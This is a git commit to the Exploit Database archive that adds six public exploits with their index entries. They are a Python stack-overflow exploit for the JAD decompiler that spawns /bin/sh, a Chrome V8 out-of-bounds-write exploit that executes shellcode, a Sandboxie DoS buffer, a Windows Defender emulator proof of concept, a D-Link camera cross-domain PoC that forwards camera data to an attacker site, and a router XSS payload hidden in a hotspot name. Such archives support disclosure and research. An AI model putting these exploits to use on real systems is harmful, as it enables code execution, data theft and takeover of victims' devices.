DB: 2017-05-27

6 new exploits Sandboxie 5.18 - Local Denial of Service JAD java Decompiler 1.5.8e - Local Buffer Overflow Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands Google Chrome 60.0.3080.5 V8 JavaScript Engine - Out-of-Bounds Write D-Link DCS Series Cameras - Insecure Crossdomain QWR-1104 Wireless-N Router - Cross-Site Scripting
2017-05-27 05:01:15 +00:00 · 2017-05-27 05:01:15 +00:00 · b1d5f96f79
commit b1d5f96f79
parent d77e2b2ada
7 changed files with 358 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5518,6 +5518,7 @@ id,file,description,date,author,platform,type,port
 42070,platforms/multiple/dos/42070.c,"Skia Graphics Library - Heap Overflow due to Rounding Error in SkEdge::setLine",2017-05-25,"Google Security Research",multiple,dos,0
 42071,platforms/multiple/dos/42071.html,"Mozilla Firefox < 53 - 'gfxTextRun' Out-of-Bounds Read",2017-05-25,"Google Security Research",multiple,dos,0
 42072,platforms/multiple/dos/42072.html,"Mozilla Firefox < 53 - 'ConvolvePixel' Memory Disclosure",2017-05-25,"Google Security Research",multiple,dos,0
+42073,platforms/windows/dos/42073.py,"Sandboxie 5.18 - Local Denial of Service",2017-05-25,ScrR1pTK1dd13,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9013,6 +9014,8 @@ id,file,description,date,author,platform,type,port
 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
 42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
 42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
+42076,platforms/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local,0
+42077,platforms/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15545,6 +15548,7 @@ id,file,description,date,author,platform,type,port
 42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
 42057,platforms/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,windows,remote,0
 42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
+42078,platforms/linux/remote/42078.js,"Google Chrome 60.0.3080.5 V8 JavaScript Engine - Out-of-Bounds Write",2017-05-26,halbecaf,linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37910,3 +37914,5 @@ id,file,description,date,author,platform,type,port
 42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
 42068,platforms/multiple/webapps/42068.html,"WebKit - Stealing Variables via Page Navigation in FrameLoader::clear",2017-05-25,"Google Security Research",multiple,webapps,0
 42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
+42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
+42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
--- a/platforms/hardware/webapps/42074.txt
+++ b/platforms/hardware/webapps/42074.txt
@ -0,0 +1,55 @@
+# Exploit Title: [Insecure CrossDomain.XML in D-Link DCS Series Cameras]
+# Date: [22/02/2017]
+# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
+# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/]
+# Version: [Tested on DCS-933L with firmware version 1.03. Other versions/models are also be affected]
+# Tested on: [DCS-933L with firmware version 1.03]
+# CVE : [CVE-2017-7852]
+
+==================
+#Product:-
+==================
+Small and unobtrusive, SecuriCamô IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources.
+
+==================
+#Vulnerability:-
+==================
+D-Link DCS series network cameras implement a weak CrossDomain.XML.
+
+========================
+#Vulnerability Details:-
+========================
+
+=============================================================================================================================
+Insecure CrossDomain.XML in D-Link DCS Series Cameras (CVE-2017-7852)
+=============================================================================================================================
+
+D-Link DCS cameras have a weak/insecure CrossDomain.XML file that allows sites hosting malicious Flash objects to access and/or change the device's settings via a CSRF attack. This is because of the 'allow-access-from domain' child element set to *, thus accepting requests from any domain. If a victim logged into the camera's web console visits a malicious site hosting a malicious Flash file from another Browser tab, the malicious Flash file then can send requests to the victim's DCS series Camera without knowing the credentials. An attacker can host a malicious Flash file that can retrieve Live Feeds or information from the victim's DCS series Camera, add new admin users, or make other changes to the device. Known affected devices are DCS-933L with firmware before 1.13.05, DCS-5030L, DCS-5020L, DCS-2530L, DCS-2630L, DCS-930L, DCS-932L, and DCS-932LB1. 
+
+Vendor Response:-
+----------------
+In 2016 we phased in CSRF mitigation on all CGI on the cameras so an injection like this would not be allowed authenticated or unauthenticated. Please refer to the tracking table below which includes the H/W Revision and firmware when this CSRF mitigation was enabled.
+
+DCS-2132L H/W ver:B F/W ver:2.12.00, DCS-2330L H/W ver:A F/W ver:1.13.00, DCS-2310L H/W ver:B, F/W ver:2.03.00, DCS-5029L H/W ver:A F/W ver:1.12.00,DCS-5222L H/W ver:B F/W ver:2.12.00, DCS-6212L H/W ver:A F/W ver:1.00.12, DCS-7000L H/W ver:A F/W ver:1.04.00, DCS-2132L H/W ver:A F/W ver:1.08.01, DCS-2136L H/W ver:A F/W ver:1.04.01, DCS-2210L H/W ver:A F/W ver:1.03.01, DCS-2230L H/W ver:A F/W ver:1.03.01, DCS-2310L H/W ver:A F/W ver:1.08.01, DCS-2332L H/W ver:A F/W ver:1.08.01, DCS-6010L H/W ver:A F/W ver:1.15.01, DCS-7010L H/W ver:A F/W ver:1.08.01, DCS-2530L H/W ver:A F/W ver:1.00.21, DCS-930L H/W ver:A F/W ver:1.15.04,DCS-930L H/W ver:B F/W ver:2.13.15, DCS-932L H/W ver:A  F/W ver:1.13.04, DCS-932L H/W ver:B  F/W ver:2.13.15, DCS-934L H/W ver:A  F/W ver:1.04.15, DCS-942L H/W ver:A  F/W ver:1.27, DCS-942L H/W ver:B  F/W ver:2.11.03, DCS-931L H/W ver:A  F/W ver:1.13.05, DCS-933L H/W ver:A  F/W ver:1.13.05, DCS-5009L H/W ver:A  F/W ver:1.07.05, DCS-5010L H/W ver:A  F/W ver:1.13.05, DCS-5020L H/W ver:A  F/W ver:1.13.05, DCS-5000L H/W ver:A  F/W ver:1.02.02, DCS-5025L H/W ver:A  F/W ver:1.02.10, DCS-5030L H/W ver:A  F/W ver:1.01.06
+
+#Proof-of-Concept:-
+-------------------
+1. Build a Flash file 'FlashMe.swf' using Flex SDK which would access Advance.htm from target device and send the response to attackerís site.
+2. Upload 'FlashMe.swf' to the webroot of attacking machine.
+3. Log into the Cameraís web console.
+4. From another tab in the same browser visit http://attackingsiteip.com/FlashMe.swf
+5. Flash object from Request#4 sends a GET request to http://CameraIP/advanced.htm
+6. Flash object receives response from Camera and forwards it to http://attackingsiteip.com/
+7. Sensitive information like Live Feed, WiFi password etc can be retrieved or new admin users can be added.
+
+===================================
+#Vulnerability Disclosure Timeline:
+===================================
+
+22/02/2017: First email to disclose the vulnerability to the D-Link incident response team
+17/03/2017: Vendor responded stating that this attack would not work due to recently added CSRF mitigation.Shipped two different models running latest firmware for testing.
+26/03/2017: Confirmed the fix after testing latest firmware. The 'Referer' header based CSRF protection mitigates this attack which cannot be bypassed unless there is a browser vulnerability.
+24/04/2017: Published CVE-2017-7852
+
+
+
--- a/platforms/hardware/webapps/42075.txt
+++ b/platforms/hardware/webapps/42075.txt
@ -0,0 +1,47 @@
+# Exploit Title: Aries QWR-1104 Wireless-N Router Execute JavaScript in Wireless Site Survey page.
+# Date: 26-05-2017
+# Vendor Homepage : http://www.ariesnetworks.net/
+# Firmware Version: WRC.253.2.0913
+# Exploit Author: Touhid M.Shaikh
+# Contact: http://twitter.com/touhidshaikh22
+# Website: http://touhidshaikh.com/
+# Category: Hardware
+
+
+##### Video PoC and Blog Post #####
+
+https://www.youtube.com/watch?v=jF47XQQq26o
+
+www.touhidshaikh.com/blog
+
+
+
+##### Description ######
+
+	Aries QWR-1104 Wireless-N Router this is home based router. this router provide some extra feature like WDS, Brigeding etc. while connectting another network admin must monitor network around using  Site servey page which is vulnerable to Execute malicious JavaScript code remoting in Wireless Site Survey page.
+
+
+##### POC #######
+	
+	Make a Hotspot using any device. In Hotspot's Accss point name field, Put your malicious javascript code as a name of you hotspot.
+
+	When Target Router's monitors routers around. your Malicious hotspot named router log in target's Site survey page and your hotspot javascript code executed as a javascript.(make sure doing this you whitin a target's network range.)
+
+	#### my Hotspot's name : t<script>prompt(2)</script>
+
+	### Target Servey page After Execute my Javascript ####
+
+	<tr><td bgcolor="#C0C0C0" align="center" width="20%"><pre><font size="2">t<script>prompt(2)</script></font></pre></td>
+		<td bgcolor="#C0C0C0" align="center" width="20%"><font size="2">02:1a:11:f8:**:**</font></td>
+		<td bgcolor="#C0C0C0" align="center" width="10%"><font size="2">11 (B+G+N)</font></td>
+		<td bgcolor="#C0C0C0" align="center" width="20%"><font size="2">AP</font></td>
+		<td bgcolor="#C0C0C0" align="center" width="10%"><font size="2">no</font></td>
+		<td bgcolor="#C0C0C0" align="center" width="10%"><font size="2">38</font></td>
+	</tr>
+
+
+######################################## PoC End Here ################################
+
+
+######## Thanks
+Pratik K.Tejani, Rehman, Taushif,Charles Babbage and all my friends ................
--- a/platforms/linux/local/42076.py
+++ b/platforms/linux/local/42076.py
@ -0,0 +1,39 @@
+#!/usr/bin/python
+# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
+# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
+# Tested on: GNU/Linux - Kali 2017.1 Release
+#
+# Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is
+# prone to a stack-based buffer overflow
+# vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker could exploit this vulnerability to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Package details:
+# Version: 1.5.8e-1kali1
+# Architecture: all
+#
+# Vendor homepage: http://www.varaneckas.com/jad/
+#
+
+import os,subprocess
+
+junk = "\x41" * 8150 # junk to offset
+nops = "\x90" * 24 # nops
+shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+esp = "\x18\x2e\x0e\x08" # rop call $esp from jad
+buffer = junk + esp + nops + shellcode # craft the buffer
+
+try:
+   print("[*] JAD 1.5.8 Stack-Based Buffer Overflow by Juan Sacco")
+   print("[*] Please wait.. running")
+   subprocess.call(["jad", buffer])
+except OSError as e:
+   if e.errno == os.errno.ENOENT:
+       print "JAD  not found!"
+   else:
+    print "Error executing exploit"
+   raise
--- a/platforms/linux/remote/42078.js
+++ b/platforms/linux/remote/42078.js
@ -0,0 +1,97 @@
+// Source: https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/
+//
+// v8 exploit for https://crbug.com/716044
+var oob_rw = null;
+var leak = null;
+var arb_rw = null;
+
+var code = function() {
+  return 1;
+}
+code();
+
+class BuggyArray extends Array {
+  constructor(len) {
+    super(1);
+    oob_rw = new Array(1.1, 1.1);
+    leak = new Array(code);
+    arb_rw = new ArrayBuffer(4);
+  }
+};
+
+class MyArray extends Array {
+  static get [Symbol.species]() {
+    return BuggyArray;
+  }
+}
+
+var convert_buf = new ArrayBuffer(8);
+var float64 = new Float64Array(convert_buf);
+var uint8 = new Uint8Array(convert_buf);
+var uint32 = new Uint32Array(convert_buf);
+
+function Uint64Add(dbl, to_add_int) {
+  float64[0] = dbl;
+  var lower_add = uint32[0] + to_add_int;
+  if (lower_add > 0xffffffff) {
+    lower_add &= 0xffffffff;
+    uint32[1] += 1;
+  }
+  uint32[0] = lower_add;
+  return float64[0];
+}
+
+// Memory layout looks like this:
+// ================================================================================
+// |a_ BuggyArray (0x80) | a_ FixedArray (0x18) | oob_rw JSArray (0x30)           |
+// --------------------------------------------------------------------------------
+// |oob_rw FixedDoubleArray (0x20) | leak JSArray (0x30) | leak FixedArray (0x18) |
+// --------------------------------------------------------------------------------
+// |arb_rw ArrayBuffer |
+// ================================================================================
+var myarray = new MyArray();
+myarray.length = 9;
+myarray[4] = 42;
+myarray[8] = 42;
+myarray.map(function(x) { return 1000000; });
+
+var js_function_addr = oob_rw[10];  // JSFunction for code()
+
+// Set arb_rw's kByteLengthOffset to something big.
+uint32[0] = 0;
+uint32[1] = 1000000;
+oob_rw[14] = float64[0];
+// Set arb_rw's kBackingStoreOffset to
+// js_function_addr + JSFunction::kCodeEntryOffset - 1
+// (to get rid of Object tag)
+oob_rw[15] = Uint64Add(js_function_addr, 56-1);
+
+var js_function_uint32 = new Uint32Array(arb_rw);
+uint32[0] = js_function_uint32[0];
+uint32[1] = js_function_uint32[1];
+oob_rw[15] = Uint64Add(float64[0], 128); // 128 = code header size
+
+// pop /usr/bin/xcalc
+var shellcode = new Uint32Array(arb_rw);
+shellcode[0] = 0x90909090;
+shellcode[1] = 0x90909090;
+shellcode[2] = 0x782fb848;
+shellcode[3] = 0x636c6163;
+shellcode[4] = 0x48500000;
+shellcode[5] = 0x73752fb8;
+shellcode[6] = 0x69622f72;
+shellcode[7] = 0x8948506e;
+shellcode[8] = 0xc03148e7;
+shellcode[9] = 0x89485750;
+shellcode[10] = 0xd23148e6;
+shellcode[11] = 0x3ac0c748;
+shellcode[12] = 0x50000030;
+shellcode[13] = 0x4944b848;
+shellcode[14] = 0x414c5053;
+shellcode[15] = 0x48503d59;
+shellcode[16] = 0x3148e289;
+shellcode[17] = 0x485250c0;
+shellcode[18] = 0xc748e289;
+shellcode[19] = 0x00003bc0;
+shellcode[20] = 0x050f00;
+code();
--- a/platforms/windows/dos/42073.py
+++ b/platforms/windows/dos/42073.py
@ -0,0 +1,29 @@
+author = '''
+   
+                ##############################################
+                #    Created: ScrR1pTK1dd13                  #
+                #    Name: Greg Priest                       #
+                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
+                ##############################################
+   
+# Exploit Title: Sandboxie version 5.18 local Dos Exploit
+# Date: 2017.05.25
+# Exploit Author: Greg Priest
+# Version: Sandboxie version 5.18 ... Released on 13 April 2017
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+overflow = "A" * 5000
+
+instruction = '''
+
+<1> Copy printed "AAAAA..." string to clipboard!
+<2> Sandboxie Control->Sandbox->Set Container Folder
+<3> Paste the buffer in the input then press ok
+'''
+
+print author
+print overflow
+print instruction
+
+
--- a/platforms/windows/local/42077.txt
+++ b/platforms/windows/local/42077.txt
@ -0,0 +1,85 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1260
+
+MsMpEng includes a full system x86 emulator that is used to execute any untrusted files that look like PE executables. The emulator runs as NT AUTHORITY\SYSTEM and isn't sandboxed.
+
+Browsing the list of win32 APIs that the emulator supports, I noticed ntdll!NtControlChannel, an ioctl-like routine that allows emulated code to control the emulator.
+
+You can simply create an import library like this and then call it from emulated code:
+
+$ cat ntdll.def
+LIBRARY ntdll.dll
+EXPORTS
+    NtControlChannel
+$ lib /def:ntdll.def /machine:x86 /out:ntdll.lib /nologo
+   Creating library ntdll.lib and object ntdll.exp
+$ cat intoverflow.c
+#include <windows.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <limits.h>
+
+#pragma pack(1)
+
+struct {
+    uint64_t start_va;
+    uint32_t size;
+    uint32_t ecnt;
+    struct {
+        uint16_t opcode;
+        uint16_t flags;
+        uint32_t address;
+    } data;
+} microcode;
+
+int main(int argc, char **argv)
+{
+    microcode.start_va = (uint64_t) GetProcAddress; // just some trusted page
+    microcode.size = 1;
+    microcode.ecnt = (UINT32_MAX + 1ULL + 8ULL) / 8;
+    microcode.data.opcode = 0x310f; // rdtsc
+    microcode.data.flags = 0;
+    microcode.data.address = microcode.start_va;
+    NtControlChannel(0x12, &microcode);
+    _asm rdtsc
+    return 0;
+}
+$ cl intoverflow.c ntdll.lib
+Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+intoverflow.c
+Microsoft (R) Incremental Linker Version 12.00.31101.0
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+/out:intoverflow.exe
+intoverflow.obj
+ntdll.lib
+
+
+It's not clear to me if this was intended to be exposed to attackers, but there are problems with many of the IOCTLs.
+
+* Command 0x0C allows allows you to parse arbitrary-attacker controlled RegularExpressions to Microsoft GRETA (a library abandoned since the early 2000s). This library is not safe to process untrusted Regex, a testcase that crashes MsMpEng attached. Note that only packed executables can use RegEx, the attached sample was packed with UPX. ¯\_(ツ)_/¯
+
+* Command 0x12 allows you to load additional "microcode" that can replace opcodes. At the very least, there is an integer overflow calculating number of opcodes provided (testcase attached). You can also redirect execution to any address on a "trusted" page, but I'm not sure I understand the full implications of that.
+
+* Various commands allow you to change execution parameters, set and read scan attributes and UFS metadata (example attached). This seems like a privacy leak at least, as an attacker can query the research attributes you set and then retrieve it via scan result.
+
+The password for all archives is "msmpeng".
+
+################################################################################
+
+I noticed additional routines (like NTDLL.DLL!ThrdMgr_SwitchThreads) that could not be imported, and looked into how they work.
+
+It turns out the emulator defines a new opcode called "apicall" that has an imm32 operand. If you disassemble one of the routines that can be imported, you'll see a small stub that uses an undefined opcode - that is an apicall. To use the apicall instruction, you need to calculate crc32(modulename) ^ crc32(procname), and then use that as the 32 bit immediate operand.
+
+If you think that sounds crazy, you're not alone.
+
+So if we wanted to call NTDLL.DLL!MpUfsMetadataOp, we would need to calculate crc32("NTDLL.DLL") ^ crc32("MpUfsMetadataOp"), then encode that as 0x0f 0xff 0xf0 <result>. There is an example wrapper in C that demonstrates its usage below.
+
+I'm planning to wait to see if Microsoft really intended to expose these additional apis to attackers before I audit more of them. It looks like the other architectures, like MSIL, also have an apicall instruction.
+
+Filename: apicall.c
+The password for all archives is "msmpeng"
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42077.zip